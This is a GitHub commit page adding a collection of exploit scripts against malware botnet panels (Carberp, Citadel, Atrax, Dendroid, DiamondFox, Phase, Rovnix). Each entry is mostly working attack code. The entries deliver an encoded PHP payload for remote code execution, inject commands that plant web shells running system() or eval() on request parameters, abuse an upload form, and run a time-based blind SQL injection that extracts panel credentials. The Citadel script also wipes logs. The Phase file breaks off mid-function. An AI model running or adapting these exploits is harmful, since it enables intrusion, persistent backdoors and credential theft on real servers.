Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
039f59e
commit 686d940
Showing
11 changed files
with
411 additions
and
9 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,56 @@ | ||
#### Caberp | ||
|
||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<table width="607" border="0"> | ||
<tr> | ||
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>"> | ||
<label for="carberp">Domain: </label> | ||
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" /> | ||
<input type="submit" name="button" id="button" value="Ownz !" /> | ||
</form></td> | ||
</tr> | ||
<tr> | ||
<td><?php | ||
/* | ||
Xyl2k! | ||
Greeting to Xartrick for fixing the payload (: | ||
*/ | ||
if(!isset($_POST['urlz'])) ; | ||
else | ||
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL)) | ||
{ | ||
echo "<font color='red'>URL is not valid</font>"; | ||
} | ||
else | ||
{ | ||
{ | ||
$data = array( | ||
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV', | ||
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q='); | ||
$ch = curl_init(); | ||
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php"); | ||
curl_setopt($ch, CURLOPT_HEADER, 0); | ||
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); | ||
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); | ||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | ||
curl_setopt($ch, CURLOPT_POST, 1); | ||
curl_setopt($ch,CURLOPT_TIMEOUT,30); | ||
curl_setopt($ch, CURLOPT_POSTFIELDS, $data); | ||
$contents = curl_exec($ch); | ||
curl_close($ch); | ||
if (preg_match("#-#", $contents)) | ||
{ echo "<pre>" . $contents . "</pre>"; } | ||
else | ||
{ echo "<font color='red'>Not vulnerable :(</font>"; } | ||
} | ||
} | ||
?></td> | ||
</tr> | ||
</table> | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,6 +1,58 @@ | ||
#### Citadel | ||
|
||
``` | ||
Type: SQLi | ||
``` | ||
Vuln: http://localhost/cp.php?bots=1 | ||
``` | ||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
|
||
``` | ||
import urllib | ||
import urllib2 | ||
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability | ||
# Work only on windows box | ||
def request(url, params=None, method='GET'): | ||
if method == 'POST': | ||
urllib2.urlopen(url, urllib.urlencode(params)).read() | ||
elif method == 'GET': | ||
if params == None: | ||
urllib2.urlopen(url) | ||
else: | ||
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read() | ||
def uploadShell(url, filename, payload): | ||
data = { | ||
'b' : 'tapz', | ||
'p1' : 'faggot', | ||
'p2' : 'hacker | echo "' + payload + '" >> ' + filename | ||
} | ||
request(url + 'test.php', data) | ||
def shellExists(url): | ||
return urllib.urlopen(url).getcode() == 200 | ||
def cleanLogs(url): | ||
delete = { | ||
'delete' : '' | ||
} | ||
request(URL + 'control.php', delete, 'POST') | ||
URL = 'http://localhost/citadel/winserv_php_gate/' | ||
FILENAME = 'shell.php' | ||
PAYLOAD = '<?php phpinfo(); ?>' | ||
uploadShell(URL, FILENAME, PAYLOAD) | ||
print '[~] Shell created!' | ||
if not shellExists(URL + FILENAME): | ||
print '[-]', FILENAME, 'not found...' | ||
else: | ||
print '[+] Go to:', URL + FILENAME | ||
cleanLogs(URL) | ||
print '[~] Logs cleaned!' | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,98 @@ | ||
#### Atrax | ||
|
||
|
||
Type: Shell Upload Vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
import random | ||
import string | ||
import base64 | ||
import urllib | ||
import urllib2 | ||
# <CONFIG> | ||
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>' | ||
url = 'http://localhost/atrax/' | ||
# </CONFIG> | ||
BOT_MODE_INSERT = 'b' # BOT MODE | ||
BOT_MODE_RUNPLUGIN = 'e' | ||
GET_PARAM_MODE = 'a' # GET PARAM | ||
POST_PARAM_GUID = 'h' # POST PARAM | ||
POST_PARAM_IP = 'i' | ||
POST_PARAM_BUILDID = 'j' | ||
POST_PARAM_PC = 'k' | ||
POST_PARAM_OS = 'l' | ||
POST_PARAM_ADMIN = 'm' | ||
POST_PARAM_CPU = 'n' | ||
POST_PARAM_GPU = 'o' | ||
POST_PARAM_PLUGINNAME = 'q' | ||
def request(url, get, post): | ||
if not get == '': | ||
url += '?' + get | ||
encoded = {} | ||
if not post == '': | ||
for _ in post.split('&'): | ||
data = _.split('=') | ||
encoded[data[0]] = data[1] | ||
encoded = urllib.urlencode(encoded) | ||
request = urllib2.Request(url, encoded) | ||
response = urllib2.urlopen(request) | ||
page = response.read() | ||
return page | ||
def queryValue(key, value, next=True): | ||
ret = key + '=' + value | ||
if next: | ||
ret += '&' | ||
return ret | ||
def randomString(length = 8): | ||
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length)) | ||
def createVictim(url, guid, ip): | ||
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False) | ||
post = queryValue(POST_PARAM_GUID, guid) | ||
post += queryValue(POST_PARAM_IP, ip) | ||
post += queryValue(POST_PARAM_BUILDID, randomString()) | ||
post += queryValue(POST_PARAM_PC, randomString()) | ||
post += queryValue(POST_PARAM_OS, randomString()) | ||
post += queryValue(POST_PARAM_ADMIN, 'yes') | ||
post += queryValue(POST_PARAM_CPU, randomString()) | ||
post += queryValue(POST_PARAM_GPU, randomString(), False) | ||
return request(url + 'auth.php', get, post) | ||
def exploit(url, guid, ip, file, payload): | ||
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False) | ||
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer') | ||
post += queryValue(POST_PARAM_GUID, guid) | ||
post += queryValue(POST_PARAM_IP, ip) | ||
post += queryValue('am', randomString()) | ||
post += queryValue('ad', file) | ||
post += queryValue('ab', base64.b64encode(payload)) | ||
post += queryValue('ai', '18', False) | ||
request(url + 'auth.php', get, post) | ||
def testExploit(url, guid, ip): | ||
file = randomString() + '.php' | ||
payload = '<?php echo("1337"); ?>' | ||
exploit(url, guid, ip, file, payload) | ||
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337' | ||
guid = '7461707a7461707a7461707a7461707a' | ||
ip = '91.224.13.103' | ||
file = randomString() + '.php' | ||
if createVictim(url, guid, ip).strip() == 'STOP': | ||
print '[-] Cannot create victim...' | ||
else: | ||
print '[~] Victim created/updated...' | ||
if testExploit(url, guid, ip): | ||
exploit(url, guid, ip, file, payload) | ||
print '[+] Exploit uploaded!' | ||
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file | ||
else: | ||
print '[-] Cannot upload payload, maybe the plugin is not actived?' | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
#### Dendroid | ||
|
||
|
||
Type: Remote Code Execution | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
import requests | ||
# Add URL | ||
# Set a PHP payload | ||
# Go to http://website/config.php | ||
URL = 'http://localhost/Panel/applysettings.php' | ||
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '" | ||
data = { | ||
'dbhost' : 'localhost', | ||
'dbname' : 'dendroid', | ||
'dbusername' : 'root', | ||
'dbpassword' : '', | ||
'username' : 'admin', | ||
'password' : 'admin', | ||
'postboxsize' : '10', | ||
'devicetablerefr' : '10000', | ||
'filetablerefr' : '10000', | ||
'historyboxrefr' : '5000', | ||
'botoffline' : '60', | ||
'timezone' : "Europe/Brussels';" + PAYLOAD, | ||
'messageboxscroll' : 'Yes', | ||
} | ||
headers = { 'Host': '127.0.0.1' } | ||
req = requests.post(URL, data=data, headers=headers) | ||
print 'HACKED!' | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
#### Gorynych/DiamondFox v4.2.0.257 | ||
|
||
|
||
Type: File Upload Vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title> | ||
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b --> | ||
</head> | ||
<body> | ||
<h1>◉ Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability ◉</h1> | ||
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data"> | ||
<input type="file" name="upload1"> | ||
<input type="hidden" name="slots" value="1"> | ||
<input type="submit" value="PWN!""> | ||
</form> | ||
File naming convention:<br> | ||
★ file.log.php (go to logs/dump/file.log.php)<br> | ||
★ file.jpg.php (go to logs/scr/file.jpg.php)<br> | ||
★ file.LOG.php (go to logs/pass/file.LOG.php)<br> | ||
★ file.txt.php (go to logs/ftp/file.txt.php)<br> | ||
★ file.TXT.php (go to logs/rdp/file.TXT.php)<br> | ||
★ file.TxT.php (go to logs/mail/file.TxT.php)<br> | ||
★ file.html.php (go to logs/kyl/file.html.php)<br> | ||
★ file.wallet.php (go to logs/wallet/file.wallet.php) | ||
</body> | ||
</html> | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
#### Phase Botnet | ||
|
||
Type: Blind SQL injection vulnerability | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<?php | ||
// Start with PHP CLI (php pwn.php) | ||
set_time_limit(0); | ||
// Adjust this :) | ||
define('SLEEP_TIME', '4'); | ||
define('PAGE_TIME', 4); | ||
define('URL', 'http://localhost/Phase/'); | ||
echo('attacking ' . URL . PHP_EOL); | ||
get_string('username'); | ||
get_string('password'); | ||
function get_length($field) { | ||
$length = 1; | ||
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) { | ||
++$length; | ||
} | ||
echo($field . ' length: ' . $length . PHP_EOL); | ||
return $length; | ||
} | ||
function get_string($field) { | ||
$length = get_length($field); | ||
$str = ''; | ||
for ($i = 0; $i < $length; ++$i) { | ||
$str .= chr(get_char($field, $i)); | ||
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL); | ||
} | ||
return $str; | ||
} | ||
function get_char($field, $id) { | ||
$binary = ''; | ||
for ($i = 1; $i < 256; $i *= 2) { | ||
if ($i == 128) | ||
$binary = '0' . $binary; | ||
else | ||
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary; | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
#### Rovnix | ||
|
||
|
||
Type: Hash Collision | ||
|
||
Author: [Xylitol](https://twitter.com/Xylit0l) | ||
|
||
``` | ||
<?php | ||
/** | ||
* Defeat the weak hash function of Rovnix | ||
* to get password from a hash. | ||
*/ | ||
$HASH = 'fbff791ef0770855e599ea6f87d41653'; | ||
$value = getNumber($HASH); | ||
$search = search($value, $HASH); | ||
echo('Hash: ' . $HASH . '<br />'); | ||
echo('Value: ' . $value . '<br />'); | ||
echo('Search: ' . $search); | ||
// Search an working (number) password | ||
function search($value, $hash) { | ||
$i = 0; | ||
while (true) { | ||
if (getHash($i) == $value) | ||
return $i; | ||
$i++; | ||
} | ||
} | ||
// Get the hashed number | ||
function getNumber($hash) { | ||
$i = 0; | ||
while (true) { | ||
if (md5($i) == $hash) | ||
return $i; | ||
$i++; | ||
} | ||
} | ||
// Hash function without final MD5 (return only numbers) | ||
function getHash($hash) { | ||
$salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%jkjJn@@j$r@!cdh*!@#$djl1J$r!j@o*$@duJxlJLEKJkJFKJEJ2$jkeJFJLEJFE'; | ||
return $hash + $salt + md5($salt) + md5($hash) + $salt[3]; | ||
} | ||
?> | ||
``` |
Oops, something went wrong.